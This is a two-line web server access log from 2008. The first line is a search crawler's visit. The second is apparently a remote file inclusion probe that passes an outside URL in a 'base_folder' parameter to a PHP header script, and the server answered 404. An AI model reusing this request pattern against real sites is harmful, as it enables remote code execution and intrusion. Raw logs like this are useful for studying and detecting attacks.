74.6.26.173 - - [22/Feb/2008:07:37:03 -0800] "GET /logs/access_071124.log HTTP/1.0" 200 55613 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.229.59.21 - - [22/Feb/2008:07:37:23 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
